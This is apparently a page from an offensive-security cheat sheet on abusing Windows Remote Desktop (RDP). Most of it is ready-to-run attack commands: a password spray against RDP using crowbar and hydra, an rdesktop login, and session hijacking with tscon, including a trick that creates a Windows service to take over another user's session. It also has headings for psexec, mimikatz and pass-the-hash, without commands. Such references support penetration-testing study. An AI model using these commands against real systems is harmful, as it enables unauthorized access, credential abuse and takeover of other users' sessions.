search
LinkedInGithub
githubEdit

abuse

hashtag
Password spray attack

crowbar -b rdp -s 192.168.220.142/32 -U users.txt -c 'password123'
hydra -L usernames.txt -p 'password123' 192.168.2.143 rdp

RDP login

rdesktop -U admin -p password123 192.148.34.143

hashtag
RDP session hijack attack or impersonate a user (required admin privilege)

METHOD:1

Query user
tscon #{TARGET_SESSION ID} /dest:#{our_session_name}

METHOD:2 - If we have local admin privilege

psexec
mimikatz

TRICK - create windows service

Query user
sc.exe create sessionhijack binpath= "cmd.exe /k tscon 2 /dest:rdp-tcp#13"
Net start sessionhijack

hashtag
RDP - pass the hash attack

RDP Restriction mode disable

PTH attack command

PreviousrdpNextenumeration

Last updated